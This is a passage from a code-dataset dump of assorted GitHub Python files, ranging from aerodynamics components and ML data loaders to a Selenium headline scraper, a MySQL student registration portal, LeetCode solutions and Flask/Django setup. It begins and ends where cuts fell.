train_loadr, ntry)\n if eid == 0:\n path = last_layer(solution, model, path)\n else:\n path = sparsify(solution, model, path, ntry)\n # model.to(device)\n # err, loss = eval_epoch(model, train_loader)\n # print(f\"error: {err}, loss: {loss}\")\n # model.to(torch.device('cpu'))\n #both paths are computed\n\n quant_ds.index = [1,2]\n quant_ref.index = [1,2]\n quant_ds = quant_ds.mean().droplevel(\"layer\")\n quant_ref = quant_ref.mean().droplevel(\"layer\")\n sizes = [l.in_features for l in solution.network if isinstance(l, nn.Linear)] + [solution.network[-1].out_features]\n connect_two_models(paths[1], models[1], models[2], sizes)\n\n paths[1].extend(paths[2]) # terminate the path 1 with path 2\n dname = args.output if args.output is not None else os.path.join(os.path.commonpath([args.M1,args.M2]), \"path\")\n os.makedirs(dname, exist_ok=True)\n quant_ds.to_csv(os.path.join(dname, \"B.csv\"))\n quant_ref.to_csv(os.path.join(dname, \"ref.csv\"))\n stats = eval_path(paths[1], sizes, dirname=dname)\n stats.to_csv(os.path.join(dname, 
f'A.csv'))\n\n\n\n\n\n\n","repo_name":"modeconnectivity/modeconnectivity","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":24986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"1539440456","text":"import numpy as np\n\nimport openmdao.api as om\n\n\nclass PanelForcesSurf(om.ExplicitComponent):\n \"\"\"\n Take in the computed panel forces and convert them to sectional forces\n for each surface. Basically just takes the long array that has info\n for all surfaces and creates a new output for each surface with only\n that surface's panel forces.\n\n Parameters\n ----------\n panel_forces[system_size, 3] : numpy array\n All of the forces acting on all panels in the total system.\n\n Returns\n -------\n sec_forces[nx-1, ny-1, 3] : numpy array\n Only the panel forces for one individual lifting surface.\n There is one of these per surface.\n \"\"\"\n\n def initialize(self):\n self.options.declare(\"surfaces\", types=list)\n\n def setup(self):\n surfaces = self.options[\"surfaces\"]\n\n system_size = 0\n\n # Loop through the surfaces to get the total system size\n for surface in surfaces:\n mesh = surface[\"mesh\"]\n nx = mesh.shape[0]\n ny = mesh.shape[1]\n\n system_size += (nx - 1) * (ny - 1)\n\n arange = np.arange(3 * system_size)\n\n self.add_input(\"panel_forces\", shape=(system_size, 3), units=\"N\")\n\n # Loop through the surfaces and add the output of sec_forces based on\n # the size of each surface. Here we keep track of the total indices\n # from panel_forces to make sure the forces go to the correct output\n ind1, ind2 = 0, 0\n for surface in surfaces:\n mesh = surface[\"mesh\"]\n nx = mesh.shape[0]\n ny = mesh.shape[1]\n name = surface[\"name\"]\n\n sec_forces_name = \"{}_sec_forces\".format(name)\n\n ind2 += (nx - 1) * (ny - 1) * 3\n\n self.add_output(sec_forces_name, shape=(nx - 1, ny - 1, 3), units=\"N\", tags=[\"mphys_coupling\"])\n\n rows = np.arange((nx - 1) * (ny - 1) * 3)\n cols = arange[ind1:ind2]\n self.declare_partials(sec_forces_name, \"panel_forces\", val=1.0, rows=rows, cols=cols)\n\n ind1 += (nx - 1) * (ny - 1) * 3\n\n def compute(self, inputs, outputs):\n surfaces = self.options[\"surfaces\"]\n\n ind1, ind2 = 0, 0\n for surface in surfaces:\n mesh = surface[\"mesh\"]\n nx = mesh.shape[0]\n ny = mesh.shape[1]\n name = surface[\"name\"]\n\n sec_forces_name = \"{}_sec_forces\".format(name)\n\n ind2 += (nx - 1) * (ny - 1)\n\n # Just pluck out the relevant forces and reshape them\n outputs[sec_forces_name] = inputs[\"panel_forces\"][ind1:ind2].reshape((nx - 1, ny - 1, 3))\n\n ind1 += (nx - 1) * (ny - 1)\n","repo_name":"mdolab/OpenAeroStruct","sub_path":"openaerostruct/aerodynamics/panel_forces_surf.py","file_name":"panel_forces_surf.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"70"}
+{"seq_id":"12681151464","text":"# coding=utf-8\nimport sys\nimport re\n\nfrom condition_identification.dict_management.dict_manage import EntityDict\nfrom condition_identification.document_parsing.html_parser import HtmlParser\nfrom condition_identification.entity_link.entity_recognizer import EntityRecognizer\nfrom condition_identification.predicate_extraction.tuple_extracter import TupleExtracter\nfrom condition_identification.syntax_analysis.sentence_analysis import HanlpSynataxAnalysis\nfrom condition_identification.word_segmentation.jieba_segmentation import Segmentation\n\nsys.path.append(\"..\")\n\nimport jieba.posseg as pseg\n\nif __name__==\"__main__\":\n # get sentences\n html_parser = HtmlParser()\n sentences = []\n with open(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\doc\\html\\广州南沙新区_自贸片区_促进总部经济发展扶持办法.html', 'r',\n encoding=\"UTF-8\") as html_file:\n sentences = html_parser.parse_document(html_parser.load_file(html_file))\n #print(sentences)\n\n # init jieba\n segmentation = Segmentation()\n\n # load dict\n entity_set = EntityDict()\n entity_set.load_dict(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\word_segmentation\\norm_dict', \"norm\")\n entity_set.load_dict(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\word_segmentation\\category_dict',\"category\")\n entity_set.load_dict(r'C:\\Users\\edward\\Documents\\GitHub\\NS_policy_recommendation\\res\\word_segmentation\\qualification_dict',\"qualification\")\n #print(entity_set.entity_set)\n\n for entity in entity_set.entity_word:\n segmentation.tokenizer.add_word(entity,1000)\n #print(entity)\n\n # process a sentence\n cut_sentences=[]\n for sentence in sentences:\n #wordss=segmentation.cut(sentence)\n words = segmentation.psegcut(sentence)\n cut_sentences.append(tuple(words))\n\n # recognize entity\n sentence_entity_dict = {}\n entityrecognizer = EntityRecognizer()\n for i,sentence in enumerate(cut_sentences):\n result = entityrecognizer.entity_mark(sentence,entity_set.entity_set)\n if len(result) > 0:\n sentence_entity_dict[i] = result\n #print(sentence_entity_dict)\n\n # analyse sentence and extract three-tuples\n hanlpanalysis = HanlpSynataxAnalysis()\n extracter = TupleExtracter()\n sentence_tuple = []\n sentence_spo_dict= {}\n\n for key in sentence_entity_dict:\n sentence_entity = sentence_entity_dict[key]\n\n sentence = sentences[key]\n #sentence = hanlpanalysis.sentencePreprocessing(sentence,sentence_entity)\n\n sentences[key] = sentence\n split_sentence = re.split(\"[;;。,,]\",sentence)\n spoarray=[]\n\n for one_sentence in split_sentence:\n if len(one_sentence) == 0:\n continue\n\n syntaxtuple = hanlpanalysis.parseDependency(one_sentence)\n spo_tuple = extracter.predicate_extraction(syntaxtuple,sentence_entity)\n if spo_tuple != None:\n spoarray.append(spo_tuple)\n if len(spoarray) > 0:\n sentence_spo_dict[key] = spoarray\n\n for key in sentence_spo_dict:\n print(sentences[key])\n print(sentence_spo_dict[key])\n print(\"\\n\")\n\n","repo_name":"fishersosoo/NS_policy_recommendation","sub_path":"tests/testmain.py","file_name":"testmain.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"70"}
+{"seq_id":"15747700264","text":"from selenium import webdriver\nimport time\nimport os.path\nimport json\nfrom selenium.webdriver.common.by import By\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\sergs\\PycharmProjects\\Selenium\\chromedriver.exe\")\ntry:\n driver.get(url=\"https://www.marvel.com\")\n time.sleep(1)\n name = driver.title\n print(name)\n elements =driver.find_elements(By.CLASS_NAME,\"card-body__unlinked\")\n findmarvel = driver.find_elements(By.CLASS_NAME,\"card-body__headline\")\n path = os.path.join(\"baka\", \"test.txt\")\n file=open(path,\"w\")\n list=[]\n list1=[]\n for i in elements:\n if i.text:\n list.append(i.text)\n for j in findmarvel:\n if j.text:\n list1.append(j.text)\n for i,j in zip(list,list1):\n file.write(i+\" - \"+j+\"\\n\")\n file.close()\n\n\nexcept:\n print(\"error\")\n\nfinally:\n driver.close()\n driver.quit()","repo_name":"ENERGO-pixel/HomeWork","sub_path":"014_Selenium/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"41109332465","text":"import mysql.connector\nimport time\n\n\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"strongpassword\",\n database=\"aims\",\n autocommit=True\n)\n\ncursor_my = mydb.cursor()\n\ndef gradesheet(user_id):\n cursor_my.execute(\"SELECT * FROM Students WHERE stu_id= %s\",(user_id,))\n no_stu=cursor_my.fetchall()\n semester=0\n sem_gpa=0\n cnt=0\n cgpa=0\n cnt_cgpa=0\n \n print (\"Student Name: \", no_stu[0][1] ,\" Student Roll No: \" ,no_stu[0][0])\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id= %s ORDER BY sem\",(user_id,))\n graded_courses= cursor_my.fetchall()\n no_courses=len(graded_courses)\n if(no_courses==0):\n print(\"No courses found in database!\")\n time.sleep(3)\n return\n for n in range(no_courses):\n if(semester!=graded_courses[n][3]):\n semester=graded_courses[n][3]\n if(cnt!=0 and sem_gpa!=0):\n print(\" SGPA\",sem_gpa/cnt)\n print(\" \")\n sem_gpa=0\n cnt=0\n print(\" Semester: \",semester)\n \n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id= %s\",(graded_courses[n][0],))\n res=cursor_my.fetchall()\n if(graded_courses[n][2]!=\"-1\"):\n cgpa=cgpa+float(graded_courses[n][2])\n sem_gpa=sem_gpa+float(graded_courses[n][2])\n cnt=cnt+1 \n print(graded_courses[n][0],res[0][1],graded_courses[n][2]) \n cnt_cgpa=cnt_cgpa+1\n else:\n print(graded_courses[n][0],res[0][1],\"W\")\n if(cnt!=0):\n print(\" SGPA: \",sem_gpa/cnt)\n else:\n print(\" SGPA: \",sem_gpa)\n print(\" \")\n cgpa=cgpa/cnt_cgpa\n print(\" Your CGPA: \",cgpa)\n input(\"\\nPress Enter to return to menu...\")\n return\n\ndef calc_cgpa(user_id):\n cursor_my.execute(\"SELECT * FROM Students WHERE stu_id= %s\",(user_id,))\n no_stu=cursor_my.fetchall()\n semester=0\n sem_gpa=0\n cnt=0\n cgpa=0\n cnt_cgpa=0\n \n # print (\"Student Name: \", no_stu[0][1] ,\" Student Roll No: \" ,no_stu[0][0])\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id= %s ORDER BY sem\",(user_id,))\n graded_courses= cursor_my.fetchall()\n no_courses=len(graded_courses)\n if(no_courses==0):\n # print(\"No courses found in database!\")\n time.sleep(3)\n return\n for n in range(no_courses):\n if(semester!=graded_courses[n][3]):\n semester=graded_courses[n][3]\n if(cnt!=0 and sem_gpa!=0):\n # print(\" SGPA\",sem_gpa/cnt)\n # print(\" \")\n sem_gpa=0\n cnt=0\n # print(\" Semester: \",semester)\n \n \n\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id= %s\",(graded_courses[n][0],))\n res=cursor_my.fetchall()\n if(graded_courses[n][2]!=\"-1\"):\n cgpa=cgpa+float(graded_courses[n][2])\n sem_gpa=sem_gpa+float(graded_courses[n][2])\n cnt=cnt+1 \n # print(graded_courses[n][0],res[0][1],graded_courses[n][2]) \n cnt_cgpa=cnt_cgpa+1\n # else:\n # print(graded_courses[n][0],res[0][1],\"W\")\n # if(cnt!=0):\n # print(\" SGPA: \",sem_gpa/cnt)\n # else:\n # print(\" SGPA: \",sem_gpa)\n print(\" \")\n cgpa=cgpa/cnt_cgpa\n print(\" Your CGPA: \",cgpa)\n time.sleep(5)\n return\n\ndef reg_course(user_id):\n student_user_id=user_id\n flag_present=0\n print(\"FLoated courses in ongoing semester are: \")\n cursor_my.execute(\"SELECT * FROM Faculty_offering\")\n offered_course=cursor_my.fetchall()\n no_offer_course=len(offered_course)\n for f in offered_course:\n \n print(f,\"\\n\")\n print(\" \")\n course_to_enroll=input(\"Enter Course_ID which you want to enroll/register: \")\n cursor_my.execute(\"SELECT * FROM Faculty_offering WHERE course_id=%s\",(course_to_enroll,))\n enroll_course=cursor_my.fetchall()\n if(len(enroll_course)==0):\n 
print(\"Course not offered.... Please retry...\")\n input(\"Press Enter to go to menu...\")\n return\n else:\n flag_present=1\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id=%s\",(student_user_id,))\n graded_courses=cursor_my.fetchall()\n no_of_courses=len(graded_courses)\n cnt=0\n credits_enrolled_currently=0\n credits_completed=0\n semester=0\n credits_left=16\n cursor_my.execute(\"SELECT * FROM Enrolled_students WHERE stu_id=%s\",(student_user_id,))\n enroll_courses=cursor_my.fetchall()\n no_enroll_courses=len(enroll_courses)\n for e in range(no_enroll_courses):\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id=%s\",(enroll_courses[e][0],))\n course_det= cursor_my.fetchall()\n no_of_courses=len(course_det)\n credits_enrolled_currently=credits_enrolled_currently+int(course_det[0][6],)\n print(\"You have Enrolled for \",credits_enrolled_currently,\" credits\")\n\n for c in range(no_enroll_courses):\n if(float(enroll_courses[c][2])>=4 ):\n if(float(enroll_courses[c][2])<=10):\n\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id=%s\",(enroll_courses[c][0],))\n res_courses=cursor_my.fetchall()\n semester=int(graded_courses[c][3])\n credits_completed=credits_completed+float(res_courses[0][6])\n cnt=cnt+1\n if(semester!=0):\n print(\"Completed credits till now: \",credits_completed)\n credits_left=((credits_completed/semester)*(125/100))-credits_enrolled_currently\n print(\"Credits left to enroll a course \",credits_left)\n if(credits_left<0):\n time.sleep(5)\n return\n \n\n flag_comp_pre_req=0\n #check_pre_req\n requisite=0\n cursor_my.execute(\"SELECT * FROM Course_pre_req WHERE course_id =%s\",(course_to_enroll,))\n pre_req=cursor_my.fetchall()\n no_pre_req=len(pre_req)\n for p in range(no_pre_req):\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE course_id=%s and stu_id=%s and points!=%s and points!=%s\",(pre_req[p][1],student_user_id,\"0\",\"-1\",))\n grade_course=cursor_my.fetchall()\n no_grade_course=len(grade_course)\n if(no_grade_course!=0):\n requisite=requisite+1\n if(requisite==no_pre_req):\n flag_comp_pre_req=1\n\n cursor_my.execute(\"SELECT * FROM Enrolled_students WHERE course_id=%s and stu_id=%s\",(course_to_enroll,student_user_id,))\n result= cursor_my.fetchall()\n no_res=len(result)\n if(flag_present==1):\n if(no_res==0):\n if(semester==0): #new student\n cursor_my.execute(\"INSERT INTO Enrolled_students VALUES (%s,%s,%s)\",(course_to_enroll,student_user_id,str(semester+1),))\n print(\"Course \",course_to_enroll,\" registered successfully!\")\n time.sleep(4)\n return\n else:\n print(\"You are already enrolled for the ... Cannot register again... 
\\n Taking to menu...\")\n time.sleep(4)\n return\n if(flag_present==1): #course present in catalog\n if(flag_comp_pre_req==1): #course pre req completed\n if(no_res==0): # course not already registered\n \n #calculate_CGPA\n cursor_my.execute(\"SELECT * FROM Students WHERE stu_id= %s\",(user_id,))\n no_stu=cursor_my.fetchall()\n semester=0\n sem_gpa=0\n cnt=0\n cgpa=0\n cnt_cgpa=0\n \n # print (\"Student Name: \", no_stu[0][1] ,\" Student Roll No: \" ,no_stu[0][0])\n cursor_my.execute(\"SELECT * FROM Graded_courses WHERE stu_id= %s ORDER BY sem\",(user_id,))\n graded_courses= cursor_my.fetchall()\n no_courses=len(graded_courses)\n if(no_courses==0):\n # print(\"No courses found in database!\")\n time.sleep(3)\n return\n for n in range(no_courses):\n if(semester!=graded_courses[n][3]):\n semester=graded_courses[n][3]\n if(cnt!=0 and sem_gpa!=0):\n # print(\" SGPA\",sem_gpa/cnt)\n # print(\" \")\n sem_gpa=0\n cnt=0\n # print(\" Semester: \",semester)\n \n \n \n\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id= %s\",(graded_courses[n][0],))\n res=cursor_my.fetchall()\n if(graded_courses[n][2]!=\"-1\"):\n cgpa=cgpa+float(graded_courses[n][2])\n sem_gpa=sem_gpa+float(graded_courses[n][2])\n cnt=cnt+1 \n # print(graded_courses[n][0],res[0][1],graded_courses[n][2]) \n cnt_cgpa=cnt_cgpa+1\n # else:\n # print(graded_courses[n][0],res[0][1],\"W\")\n # if(cnt!=0):\n # print(\" SGPA: \",sem_gpa/cnt)\n # else:\n # print(\" SGPA: \",sem_gpa)\n print(\" \")\n cgpa=cgpa/cnt_cgpa\n print(\" \")\n cursor_my.execute(\"SELECT * FROM Faculty_offering WHERE course_id=%s\",(course_to_enroll,))\n o=cursor_my.fetchall()\n if( cgpa >= float(o[0][2])):\n cursor_my.execute(\"SELECT * FROM Course_catalog WHERE course_id=%s\",(course_to_enroll,))\n c=cursor_my.fetchall()\n if(credits_left-float(c[0][6])<0):\n print(\"You are not allowed to add more courses...\\n Credit limit reached...\\n Please Deregister a course to add new courses\\n\")\n time.sleep(4)\n return\n else:\n cursor_my.execute(\"INSERT INTO Enrolled_students VALUES (%s,%s,%s)\",(course_to_enroll,student_user_id,str(semester+1),))\n print(\"Course \",course_to_enroll,\" registered successfully\")\n time.sleep(4)\n return\n \n else:\n print(\"CGPA Eligibility criteria not fulfilled...\\n Required CGPA: \")\n print(o[0][2])\n time.sleep(4)\n return\n \n else:\n print(\"You are already enrolled for the ... Cannot register again... 
\\n Taking to menu...\")\n                    time.sleep(4)\n                    return\n            else:\n                print(\"Course pre-requisite criteria not fulfilled \\n Cannot register...\\n Taking to menu...\")\n                time.sleep(4)\n                return\n\n    time.sleep(5)\n    return\n\ndef dereg_course(user_id):\n    print(\"Your enrolled courses are:\\n\")\n    cursor_my.execute(\"SELECT course_id FROM Enrolled_students WHERE stu_id = %s\",(user_id,))\n    ids=cursor_my.fetchall()\n    for d in ids:\n        print(d)\n    c_id=input(\"Enter Course_ID that you want to deregister: \")\n    cursor_my.execute(\"SELECT * FROM Enrolled_students WHERE course_id =%s and stu_id =%s\",(c_id,user_id,))\n    e=cursor_my.fetchall()\n    no_e=len(e)\n    if(no_e!=0):\n        cursor_my.execute(\"INSERT INTO Graded_courses VALUES(%s,%s,%s,%s)\",(e[0][0],e[0][1],\"-1\",e[0][2],))\n        cursor_my.execute(\"DELETE FROM Enrolled_students WHERE course_id=%s and stu_id=%s\",(c_id,user_id,))\n        print(\"Course deregistered successfully.\\n Course \",c_id,\" withdrawn\")\n    else:\n        print(\"Not enrolled in this course...\")\n    input(\"Press Enter to return to menu\")\n    return\n\n    ","repo_name":"mkpreet/Db_aims_portal","sub_path":"student_functions.py","file_name":"student_functions.py","file_ext":"py","file_size_in_byte":12095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9026008970","text":"import h5py\nimport numpy as np\n\nfrom core.dataset import BaseDataset\n\nclass Dataset(BaseDataset):\n def __init__(self, data, test_only=False, user_idx=0, **kwargs):\n self.test_only = test_only\n self.user_idx = user_idx\n\n # Get all data\n self.user_list, self.user_data, self.user_data_label, self.num_samples = self.load_data(data)\n\n if self.test_only: # combine all data into single array\n self.user = 'test_only'\n self.features = np.vstack([user_data['x'] for user_data in self.user_data.values()])\n self.labels = np.hstack([user_label['x'] for user_label in self.user_data_label.values()])\n else: # get a single user's data\n if user_idx is None:\n raise ValueError('in train mode, user_idx must be specified')\n\n self.user = self.user_list[user_idx]\n self.features = self.user_data[self.user]['x']\n self.labels = self.user_data_label[self.user]['x']\n\n def __getitem__(self, idx):\n items = self.features[idx].astype(np.float32).T.reshape(1,187)\n return items, self.labels[idx]\n\n def __len__(self):\n return len(self.features)\n\n def load_data(self,data):\n '''Load data from disk or memory'''\n\n if isinstance(data, str):\n try:\n data = h5py.File(data, 'r')\n except:\n raise ValueError('Only HDF5 format is allowed for this experiment')\n\n users = []\n num_samples = data['num_samples']\n features, labels = dict(), dict()\n \n # Decoding bytes from hdf5\n decode_if_str = lambda x: x.decode() if isinstance(x, bytes) else x\n for user in data['users']:\n user = decode_if_str(user)\n users.append(user)\n features[user] = {'x': data['user_data'][user]['x'][()]}\n labels[user] = {'x': data['user_data_label'][user][()]}\n\n else:\n \n users = data['users']\n features = data['user_data']\n labels = data['user_data_label']\n num_samples = data['num_samples']\n \n return users, features, labels, num_samples","repo_name":"microsoft/msrflute","sub_path":"experiments/ecg_cnn/dataloaders/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":173,"dataset":"github-code","pt":"70"}
+{"seq_id":"28260203070","text":"class Solution:\n def selfDividingNumbers(self, left, right):\n nums = []\n for n in range(left, right+1):\n if 1<=n<10:\n nums.append(n)\n else:\n is_divide = True\n nn = n\n while n > 0:\n if n%10 == 0 or nn % (n%10) != 0:\n is_divide = False\n break\n n //= 10\n if is_divide:\n nums.append(nn)\n return nums\n\nimport unittest\nclass test_solution(unittest.TestCase):\n def test_all(self):\n s = Solution()\n self.assertEqual(s.selfDividingNumbers(1, 22), [1,2,3,4,5,6,7,8,9,11,12,15,22])\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SDRLurker/starbucks","sub_path":"20171121/20171121_2.py","file_name":"20171121_2.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33067319147","text":"from flask import Flask, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nimport json\nimport sys\nimport os\n\nconfig = {\n \"development\": False,\n \"static_folder\": \"../dist\",\n \"migrations_folder\": \"migrations\",\n \"sql_connection\": \"sqlite:///database.db\",\n \"session_duration\": 7200\n}\n\nconfig_file = \"/etc/tuber/tuber.json\"\n\nif '--config' in sys.argv:\n config_file = sys.argv[sys.argv.index('--config') + 1]\nif os.path.isfile(config_file):\n try:\n with open(config_file, \"r\") as FILE:\n config.update(json.loads(FILE.read()))\n except:\n sys.exit(\"Failed to parse configuration file: {}\".format(config_file))\n\nif 'DATABASE_URL' in os.environ:\n config['sql_connection'] = os.environ['DATABASE_URL']\n\napp = Flask(__name__)\napp.static_folder = config['static_folder']\n\nif config['sql_connection'].startswith(\"sqlite://\"):\n path = config['sql_connection'].split(\"sqlite://\")[1]\n if not os.path.isabs(path):\n config['sql_connection'] = \"sqlite://\" + os.path.join(os.path.dirname(__file__), \"../../\", path)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = config['sql_connection']\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndef init_db():\n global db\n db = SQLAlchemy(app)\n\n import tuber.csrf\n import tuber.models\n import tuber.static\n import tuber.api\n \n db.create_all()\n db.session.commit()\n Migrate(app, db)","repo_name":"bitbyt3r/tuber","sub_path":"tuber/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"33654715615","text":"from Class import Embeddings\nfrom Class import Vowel\nfrom Class import Search\n\nimport argparse\n\n\ndef parse():\n parser = argparse.ArgumentParser()\n parser.add_argument('query_word', help='query word')\n parser.add_argument('embeddings', help='embeddings')\n parser.add_argument('vowel_dict', help='vowel_dict')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse()\n embeddings = Embeddings.Embeddings(args.embeddings)\n vowel = Vowel.Vowel(args.vowel_dict)\n query_word = args.query_word\n search = Search.Search(match_n=3)\n rhymes = search.search_rhyme(query_word, embeddings, vowel)\n print(rhymes)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"momongaclub/japanese_rhyme_search","sub_path":"search_rhyme.py","file_name":"search_rhyme.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"33318548925","text":"from django.urls import path\nfrom .import views\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Job-candidate-hub-API\",\n default_version='v1',\n description=\"A task for Job-candidate-hub-API\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"isayaelib@gmail.com\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\n\n\nurlpatterns = [\n path('api/add-information', views.add_candidate_information, name='add_info'),\n path('api/update-information/', views.update_candidate_information, name='update_info'),\n\n # url for api Documentation using swagger\n path('docs/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n]","repo_name":"isayaeli/Job-candidate-hub-API","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"36075341779","text":"#1. Bottom-up. \nclass Solution:\n def numWays(self, n: int, k: int) -> int:\n if n == 1:\n return k\n if n == 2:\n return k * k \n \n total = [k] + [k * k] + [0] * (n-2)\n \n for i in range(2, n):\n total[i] = (k-1) * (total[i-1] + total[i-2])\n \n return total[-1]\n\n#Recurrence explanation - \n\n\"\"\"\nFor the first 1st fence, we have k options. \nFor the second fence, total ways = k * k, by permutations.\nFor n = 3 onwards, we have 2 decisions for each fence. \n 1. Paint the fence a different color than previous fence.\n For this, we have k - 1 options. so total becomes (k-1) * total[i-1]\n 2. Paint same color as previous fence.\n Number of ways = 1 * total[i-1]. But, because we have a restriction saying we can't\n paint 3 or more houses same color, we need to find in how many ways we can paint i-1th fence\n differently than i-2th fence. \n this can be done in (k - 1) * total[i-2]. Substituting that in above equation - \n 1 * total[i - 1] = 1 * (k-1) * total[i-2] = (k-1) * total[i-2].\n \n so total = (k-1) * total[i-1] + (k-1) * total[i-2]\n = (k-1) * (total[i-1] + total[i-2])\n\"\"\"","repo_name":"ggopalai/leetcode-python","sub_path":"algo/dp/paint_fence.py","file_name":"paint_fence.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"74792332066","text":"import matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom os.path import join\n\n\ndef export_lagrangian_stats(lagrangian_loss, lagrangian_multipliers, lagrangian_grad_norms, violate_amount, plot_every, path):\n num_cost_types = lagrangian_multipliers[0].shape[0]\n # Export the loss, grad norm, and violate amount\n export_csv_and_plot(\"$L_\\lambda$\", 'lagrangian_loss',lagrangian_loss, path)\n export_csv_and_plot(\"gradient of $\\lambda$\", 'lagrangian_grad', lagrangian_grad_norms, path)\n export_csv_and_plot(\"amount of violation\", 'violate_amount', violate_amount, path)\n\n # Export the values of lagrangian multiplier\n value_exp_path = join(path, 'lagrangian_value')\n for i in range(num_cost_types):\n lagrangian_i_list = [multiplier[i] for multiplier in lagrangian_multipliers]\n export_csv_and_plot(\"$\\lambda_{}$\".format(i), \"lagrangian_value_{}\".format(i), lagrangian_i_list, path)\n\n\ndef export_csv_and_plot(label, filename, value_list, path):\n with open(join(path, \"{}.csv\".format(filename)), 'w') as result_csv:\n result_csv.write(concat_float_list(value_list, ',') + '\\n')\n plot_curve(value_list, join(path, filename), label)\n\n\ndef export_train_and_valid_reward(train_reward, valid_reward, plot_every, path):\n # Export the results to a csv file\n labels = ['Training reward:,', 'Validation reward:,']\n float_lists = [train_reward, valid_reward]\n with open(path + '.csv', 'w') as result_csv:\n for i in range(len(labels)):\n result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\\n')\n print(\"Training and valid loss saved to: {}\".format(path + '.csv'))\n # Export the plots to pdf file\n plot_train_valid_curve(train_reward, valid_reward, plot_every, path, 'Reward')\n print(\"Training and valid loss plot saved to: {}\".format(path + '_reward.pdf'))\n\n\ndef export_train_and_valid_loss(train_loss, valid_loss, train_ppl, valid_ppl, plot_every, path):\n \"\"\"\n :param train_loss: a list of float\n :param valid_loss: a list of float\n :param train_ppl: a list of float\n :param valid_ppl: a list of float\n :param plot_every: int\n :param path: str\n :return:\n \"\"\"\n # Export the results to a csv file\n labels = ['Training loss:,', 'Validation loss:,', 'Training perplexity:,', 'Validation Perplexity:,']\n float_lists = [train_loss, valid_loss, train_ppl, valid_ppl]\n with open(path + '.csv', 'w') as result_csv:\n for i in range(len(labels)):\n result_csv.write(labels[i] + concat_float_list(float_lists[i], ',') + '\\n')\n print(\"Training and valid loss saved to: {}\".format(path + '.csv'))\n # Export the plots to pdf file\n plot_train_valid_curve(train_loss, valid_loss, plot_every, path, 'Loss')\n plot_train_valid_curve(train_ppl, valid_ppl, plot_every, path, 'Perplexity')\n print(\"Training and valid loss plot saved to: {}\".format(path + '_loss.pdf'))\n print(\"Training and valid ppl plot saved to: {}\".format(path + '_perplexity.pdf'))\n\n\ndef concat_float_list(list, delimiter=','):\n return delimiter.join([str(l) for l in list])\n\n\ndef plot_curve(value_list, path, value_label):\n plt.figure()\n plt.xlabel(\"Checkpoints\")\n plt.ylabel(value_label)\n num_checkpoints = len(value_list)\n X = list(range(num_checkpoints))\n plt.plot(X, value_list, label=\"training\")\n plt.legend()\n plt.savefig(\"%s.pdf\" % (path))\n\n\ndef plot_train_curve(train_loss, plot_every, path, loss_label):\n #plt.ioff()\n title = \"Training %s for every %d iterations\" % (loss_label.lower(), 
